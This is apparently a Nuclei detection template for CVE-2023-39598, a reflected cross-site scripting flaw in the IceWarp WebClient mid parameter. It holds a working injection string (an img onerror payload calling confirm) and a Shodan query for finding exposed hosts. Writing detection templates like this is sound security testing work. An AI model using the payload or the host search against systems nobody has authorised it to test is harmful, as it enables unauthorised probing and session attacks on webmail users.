40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
id: CVE-2023-39598
|
|
|
|
info:
|
|
name: IceWarp Email Client - Cross Site Scripting
|
|
author: Imjust0
|
|
severity: medium
|
|
description: |
|
|
Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.
|
|
reference:
|
|
- https://medium.com/@muthumohanprasath.r/reflected-cross-site-scripting-on-icewarp-webclient-product-cve-2023-39598-9598b92da49c
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39598
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39598
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"icewarp"
|
|
verified: "true"
|
|
tags: cve,cve2023,xss,icewarp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}"><img src=x onerror=confirm(document.domain)>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<img src=x onerror=confirm(document.domain)>"
|
|
- "icewarp"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|